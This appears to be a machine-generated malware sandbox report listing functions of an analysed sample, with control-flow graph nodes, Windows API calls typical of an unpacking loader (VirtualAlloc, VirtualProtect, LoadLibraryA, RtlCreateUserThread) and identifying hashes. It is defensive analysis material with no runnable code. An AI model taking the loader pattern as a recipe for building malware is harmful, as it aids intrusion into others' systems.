                                          • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                          • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64
                                          Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 319 403043-403067 320 40319a-40319f 319->320 321 40306d-403085 319->321 321->320 322 40308b-40309c 321->322 323 40309e-4030a7 322->323 324 4030ac-4030ba 323->324 324->324 325 4030bc-4030c3 324->325 326 4030e5-4030ec 325->326 327 4030c5-4030e4 325->327 328 40310e-403111 326->328 329 4030ee-40310d 326->329 327->326 330 403113-403116 328->330 331 40311a 328->331 329->328 330->331 332 403118 330->332 331->323 333 40311c-403121 331->333 332->333 333->320 334 403123-403126 333->334 334->320 335 403128-403197 RtlCreateUserThread NtTerminateProcess 334->335 335->320
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0
                                          • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                          • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9
                                          Function 0052003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 52003c-520047 1 520049 0->1 2 52004c-520263 call 520a3f call 520e0f call 520d90 VirtualAlloc 0->2 1->2 17 520265-520289 call 520a69 2->17 18 52028b-520292 2->18 23 5202ce-5203c2 VirtualProtect call 520cce call 520ce7 17->23 20 5202a1-5202b0 18->20 22 5202b2-5202cc 20->22 20->23 22->20 29 5203d1-5203e0 23->29 30 5203e2-520437 call 520ce7 29->30 31 520439-5204b8 VirtualFree 29->31 30->29 33 5205f4-5205fe 31->33 34 5204be-5204cd 31->34 37 520604-52060d 33->37 38 52077f-520789 33->38 36 5204d3-5204dd 34->36 36->33 40 5204e3-520505 36->40 37->38 43 520613-520637 37->43 41 5207a6-5207b0 38->41 42 52078b-5207a3 38->42 51 520517-520520 40->51 52 520507-520515 40->52 44 5207b6-5207cb 41->44 45 52086e-5208be LoadLibraryA 41->45 42->41 46 52063e-520648 43->46 48 5207d2-5207d5 44->48 50 5208c7-5208f9 45->50 46->38 49 52064e-52065a 46->49 53 5207d7-5207e0 48->53 54 520824-520833 48->54 49->38 55 520660-52066a 49->55 56 520902-52091d 50->56 57 5208fb-520901 50->57 58 520526-520547 51->58 52->58 59 5207e2 53->59 60 5207e4-520822 53->60 62 520839-52083c 54->62 61 52067a-520689 55->61 57->56 66 52054d-520550 58->66 59->54 60->48 63 520750-52077a 61->63 64 52068f-5206b2 61->64 62->45 65 52083e-520847 62->65 63->46 67 5206b4-5206ed 64->67 68 5206ef-5206fc 64->68 69 52084b-52086c 65->69 70 520849 65->70 72 5205e0-5205ef 66->72 73 520556-52056b 66->73 67->68 74 52074b 68->74 75 5206fe-520748 68->75 69->62 70->45 72->36 76 52056f-52057a 73->76 77 52056d 73->77 74->61 75->74 78 52059b-5205bb 76->78 79 52057c-520599 76->79 77->72 84 5205bd-5205db 78->84 79->84 84->66
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0052024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_520000_jtihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 919b4ee4c9051b2d158f225995026eaa3ecd924755c0c65d7b99845caff89d7f
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 4C526A75A01229DFDB64CF58D984BA8BBB1BF09304F1480D9E54DAB392DB30AE85DF14
                                          Function 0058F34D Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 336 58f34d-58f366 337 58f368-58f36a 336->337 338 58f36c 337->338 339 58f371-58f37d CreateToolhelp32Snapshot 337->339 338->339 340 58f38d-58f39a Module32First 339->340 341 58f37f-58f385 339->341 342 58f39c-58f39d call 58f00c 340->342 343 58f3a3-58f3ab 340->343 341->340 346 58f387-58f38b 341->346 347 58f3a2 342->347 346->337 346->340 347->343
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0058F375
                                          • Module32First.KERNEL32(00000000,00000224), ref: 0058F395
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0057D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_57d000_jtihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: 99d5912cafa7b642599cd3254c1fd44afca33a246eb9c85df19d6e68ee229d71
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: C5F01236600715AFD7203AF5A88DA6A7AE8BF4D725F100939FA46E14C0DB74E8458761
                                          Function 00520E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 349 520e0f-520e24 SetErrorMode * 2 350 520e26 349->350 351 520e2b-520e2c 349->351 350->351
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,00520223,?,?), ref: 00520E19
                                          • SetErrorMode.KERNELBASE(00000000,?,?,00520223,?,?), ref: 00520E1E
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_520000_jtihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: a764e639832798b8d740d17924903a9f0c649362d611a0acc80e9a5e0a88a39a
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: 75D0123114512877D7002A94DC09BCD7F1CDF05B62F008411FB0DD90C1C770994046E5
                                          Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 352 401991-4019ed call 401240 Sleep 364 4019f3-4019f5 352->364 365 4019ee call 4014c4 352->365 366 401a04-401a24 364->366 367 4019f7-4019ff call 4015b7 364->367 365->364 373 401a32 366->373 374 401a29-401a35 366->374 367->366 373->374 376 401a46 374->376 377 401a3a-401a52 call 401240 374->377 376->377
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                          • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                          • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                          • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF
                                          Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 381 4019a9-4019ed call 401240 Sleep 393 4019f3-4019f5 381->393 394 4019ee call 4014c4 381->394 395 401a04-401a24 393->395 396 4019f7-4019ff call 4015b7 393->396 394->393 402 401a32 395->402 403 401a29-401a35 395->403 396->395 402->403 405 401a46 403->405 406 401a3a-401a52 call 401240 403->406 405->406
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                          • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                          • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                          • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF
                                          Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 410 4019af-4019ed call 401240 Sleep 417 4019f3-4019f5 410->417 418 4019ee call 4014c4 410->418 419 401a04-401a24 417->419 420 4019f7-4019ff call 4015b7 417->420 418->417 426 401a32 419->426 427 401a29-401a35 419->427 420->419 426->427 429 401a46 427->429 430 401a3a-401a52 call 401240 427->430 429->430
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                          • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                          • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                          • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B
                                          Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 434 4019b8-4019ed call 401240 Sleep 438 4019f3-4019f5 434->438 439 4019ee call 4014c4 434->439 440 401a04-401a24 438->440 441 4019f7-4019ff call 4015b7 438->441 439->438 447 401a32 440->447 448 401a29-401a35 440->448 441->440 447->448 450 401a46 448->450 451 401a3a-401a52 call 401240 448->451 450->451
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 004019E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2881906138.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_400000_jtihrdr.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                          • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                          • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                          • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                          Function 0058F00C Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 455 58f00c-58f046 call 58f31f 458 58f048-58f07b VirtualAlloc call 58f099 455->458 459 58f094 455->459 461 58f080-58f092 458->461 459->459 461->459
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0058F05D
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0057D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_57d000_jtihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: fa708f404b4140f41c0418234829f32c27fbbdf9cf5d6a7240e88281e8bb790f
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 2D113279A00208EFDB01DF98C985E98BFF5AF08350F0580A4F9489B362D771EA50DF40